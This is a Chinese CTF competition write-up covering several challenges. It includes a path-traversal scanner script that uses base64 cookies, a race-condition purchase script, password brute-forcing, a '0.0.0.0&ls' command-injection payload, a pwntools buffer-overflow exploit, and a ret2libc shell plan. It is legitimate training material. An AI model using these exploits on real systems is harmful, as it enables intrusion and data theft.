6月2号-3号在华中科技大学的线下赛。
第二天开始的时候排名如下(写这篇wp的时候总成绩还没出来):
第一天比赛完后,草草写了篇wp,记录下。
Q03
使用burpsuite抓包浏览网页
发现在个别页面有名称为“uuid”的cookie。
解码后发现是文件名。
怀疑有遍历文件漏洞。
可以下载整个网站源码。
构造脚本,扫描flag。
"""
GET /captcha HTTP/1.1
Host: 172.16.9.13
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.16.9.13/login
Cookie: _xsrf=2|6704a712|711af8829da9963a3cf02d347fc186e2|1527916860; uuid="Li4vLi4vLi4vbWFpbi5weQ=="
Connection: close
"""
ko = """flag
FLAG
fl4g
f14g
hint
README
readme"""
follow = """.py
.txt
.md
.sh
"""
dic = """home/ciscn
home/ciscn/sshop
home/ciscn/sshop/views
home/ciscn/sshop/templates
home/ciscn/sshop/templates/flag
root
etc
tmp
"""
import requests
url = "http://172.16.9.13/captcha"
def check(source):
source = "../../../../../" + source
header = {
"Cookie": 'uuid="%s"' % source.encode("base64")[:-1]}
res = requests.get(url, headers=header)
if "Traceback" in res.text:
# print res.text.split("\n")[-2:-1][0].replace("/home/ciscn/sshop/captcha/jpgs/../../../../../", '/')
return
print source
print res.content
return
# open("sshop.db3","wb").write(res.content)
for d in dic.split('\n'):
for n in ko.split('\n'):
for f in follow.split('\n'):
check(d + '/' + n + f)
最终获得flag,路径为/etc/flag
Q08
http://172.16.9.18
邮箱密码找回漏洞。
在info路径下输入错误的id,发现开启了debug,可以获得返回页面中字段init_admin_email,得到邮箱后,重置邮箱密码。
使用admin帐号登录后,购买一个物品,发现有提示,当使购买的物品数量大于库存。
所以写了个竞态脚本,如下:
import requests
import multiprocessing
headers = {
"Cookie": "csrftoken=EG37B7EkFla2QgugpCaL4b5VmsrPvouUzes5sQOmsRB6Uid3U08s1GuJ91GUlUUc; sessionid=9kddlr4d90825fwnhgndwjyjtym2xpdr",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
}
url = "http://172.16.9.18/pay"
payload = {"csrfmiddlewaretoken": "3tgD8mis6rTETiaq9rMZesD3rHcnSXsJY1FBZ5suTXkIXkTdEPKGbX2RegrsItS1",
"id": 99,
"price": 0.1}
for i in range(900):
for j in range(3):
t = multiprocessing.Process(target=requests.post, kwargs={"url":url,"data":payload, "headers":headers})
t.start()
t.join()
# req = requests.post(url=url,data=payload, headers=headers)
# print(req.text)
购买成功后,出一个提示,大概内容是static/{0h_y0u_f1n411y_g0t_m3,backup.sql}
里面是10000个密码,使用这个字典暴破django后台,密码最终为:
Wh05y0urd4ddy2333
使用admin+这个密码登录后,在后台发现flag:
Congratulations! CISCN{be30f23e-5b56-4e4e-9329-54d5e08b6c32}
Q10
http://172.16.9.21/9aysh0p/
根据源码提示,得到/9aysh0p/这个目录
于是访问它,是一个商城系统。
根据hint1,扫描最底下的二维码,得到以下信息:
plz contact the administrator <0.0>;
kvzrx-tlelx-arevq-mvzlx-tlerx-areny-tlevx-mbevy-slebx-ahenx-thany-zvely-orcly-onkbk
Color egg:Babble is 13 years old this year!
中间是rot13+BubbleBabble加密,
先解rot13,解出来是ximek-gyryk-nerid-zimyk-gyrek-neral-gyrik-zoril-fyrok-nurak-gunal-miryl-bepyl-baxox
再解BubbleBabble,代码如下:
from bubblepy import BubbleBabble
print (bb.decode("ximek-gyryk-nerid-zimyk-gyrek-neral-gyrik-zoril-fyrok-nurak-gunal-miryl-bepyl-baxox"))
结果:
b'admin/admintools/index.php'
访问这个页面,发现是一个登录页面,访问后需要admin帐号登录,扫描一下,发现有admin/admintools/tools/',访问后有ping工具,怀疑可以执行shell。fuzz后,发现可以执行payload。
0.0.0.0&ls
发现列出了一堆文件。
访问第一个txt文件即为flag
pwn_p
- 输入666进入secret_code。
- 输入
327a6c4304ad5938eaf0efb6cc3e53dc+"\0" *0x20+"./"*16+"flag"进行溢出,覆盖调用cat_file调用变量。 - 再输入非[1,4]的任意数值执行cat_file函数
from pwn import *
import time
#io = process("./pwn")
io = remote('172.16.9.24', 1337)
payload = '666'
io.sendline(payload)
io.recvuntil("Please enter your password:")
payload2 = '327a6c4304ad5938eaf0efb6cc3e53dc'+'\0'*0x20+'./'*16+'flag'
io.sendline(payload2)
io.recvuntil("4) File_Flag")
io.sendline('10')
io.interactive()
pwn_n
1.漏洞点
漏洞点如下图所示,gets正常情况下最多可以输入0x1c个字符,但是gets没有做限制,并且程序没有栈保护,所以可以通过栈溢出覆盖返回地址进行攻击。
2.泄露puts函数地址计算system函数和"/bin/sh"地址
第一次栈溢出,覆盖返回地址为puts函数的plt地址,并且将puts的got表地址做为参数传递,通过次方法可以泄露出puts函数运行时的地址,然后通过查询libc数据库可以知道服务器上运行的是哪个版本的libc,然后获取system和“/bin/sh”与puts函数的偏移,最终计算出system和”/bin/sh”的运行时地址。
3.栈溢出覆盖返回地址执行system("/bin/sh")
第二次栈溢出,覆盖返回地址为system函数,参数传递为“/bin/sh”的地址,这样就可以成功拿到shell,读取flag。
赛后感想
感受到其他赛区出题人深深的恶意。好多web题目都做出来一半,就找不到切入点了。